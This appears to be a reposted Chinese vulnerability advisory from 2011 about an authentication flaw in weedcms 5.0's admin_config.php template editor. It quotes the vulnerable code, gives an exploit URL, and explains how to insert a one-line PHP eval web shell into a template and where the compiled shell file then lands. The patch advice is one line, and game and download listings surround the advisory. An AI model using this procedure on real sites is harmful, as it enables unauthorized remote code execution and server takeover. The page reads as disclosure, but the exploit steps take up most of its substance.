Php文档 Php问答行业资讯 Php论坛 Php手册 Php博客

游戏榜单

软件榜单

关闭导航

热搜榜

热门下载

热门标签

php爱好者> php文档>野草weedcms 5.0写shell漏洞

野草weedcms 5.0写shell漏洞

时间：2011-01-05 来源：心灵

发布日期：2011-01.05
发布作者：心灵

影响版本：weedcms 5.0
官方网站：http://weedcms.net

漏洞类型：设计缺陷
漏洞描述：问题文件在 includes/admin_config.php
这个程序登录验证是一个对每个方法来验证登录而不是对整个文件来验证
还是那句。。看代码

if($do=='template_edit'){ $file=empty($_GET['file'])?'':trim($_GET['file']); if(get_ext($file)!='html'&&get_ext($file)!='css'){ exit('对不起，参数非法！'); } $content=file_get_contents('templates/'.$config['site_template'].'/'.$file); $smarty=new smarty();smarty_header(); $smarty->assign('file',$file); $smarty->assign('content',$content); $smarty->display('template_info.htm'); }

文件开头的方法每个IF后都验证一次

漏洞测试EXP：http://127.0.0.1/admin.php?action=config&do=template_edit&file=part_vote.html

在文件头插入 <? eval($_POST[t00ls]);?> 然后访问一次首页缓存就生成出来了
最后马儿就在 http://127.0.0.1/temps/compile/part_vote.html.php

漏洞修复：加强验证，关注厂商补丁。

标签分类：

相关阅读更多 +

崩坏星穹铁道银河球棒侠传说魔王篇试用角色成就如何完成_崩坏星穹铁道银河球棒侠传说魔王篇试用角色成就怎么快速完成(崩坏星穹铁道银河棒球侠) 游戏攻略 2025-06-03
迷雾大陆s7魂灵师流派bd要如何搭配_迷雾大陆s7魂灵师流派解析(迷雾怎么组合道具) 游戏攻略 2025-06-03
碧蓝航线科研船换装投影功能用法介绍_碧蓝航线科研船换装投影功能解析(碧蓝航线科研船经验后宅和委托算吗) 游戏攻略 2025-06-02
最终幻想14水晶世界珠串万货街感恩大酬宾任务攻略_最终幻想14水晶世界珠串万货街感恩大酬宾任务要如何完成(最终幻想14水晶世界) 游戏攻略 2025-06-02
坦克世界端午节龙舟活动介绍_坦克世界端午节龙舟活动都有哪些内容游戏攻略 2025-06-02

排行榜更多 +

翌日波奇狗的历险记手机版下载

翌日波奇狗的历险记手机版下载

休闲益智下载

怪兽远征安卓版下载

怪兽远征安卓版下载

角色扮演下载

谷歌卫星地图免费版下载

谷歌卫星地图免费版下载

生活实用下载

4
谷歌卫星地图免费版下载
11.98MB · 93℃

1970-01-01

下载
5
kingsofpool官方正版下载
72.37MB · 93℃

1970-01-01

下载
6
毒药轮盘手机版下载
162.05M · 92℃

1970-01-01

下载